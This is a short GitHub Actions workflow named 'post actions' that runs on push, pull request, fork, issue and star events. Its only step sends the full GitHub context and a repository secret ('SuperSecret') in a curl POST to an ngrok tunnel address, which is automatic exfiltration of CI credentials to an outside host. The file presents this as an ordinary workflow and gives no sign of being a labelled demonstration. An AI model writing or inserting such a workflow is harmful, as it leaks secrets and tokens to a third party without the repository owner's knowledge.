

name: post actions

# Controls when the action will run. 

on:
  push:
  pull_request:
  fork:
  issues:
  watch:
    types: [started]

jobs:
  create_commit:
    runs-on: ubuntu-latest
    steps:
    - name: Create github context
      env:
          GITHUB_CONTEXT: ${{ toJSON(github) }}
          super_secret: ${{ secrets.SuperSecret }}  
      run: | 
        curl -d "{context:$GITHUB_CONTEXT, key: $super_secret}" -H "Content-Type: application/json" -X POST https://6b1b42be7dea.ngrok.io/payload


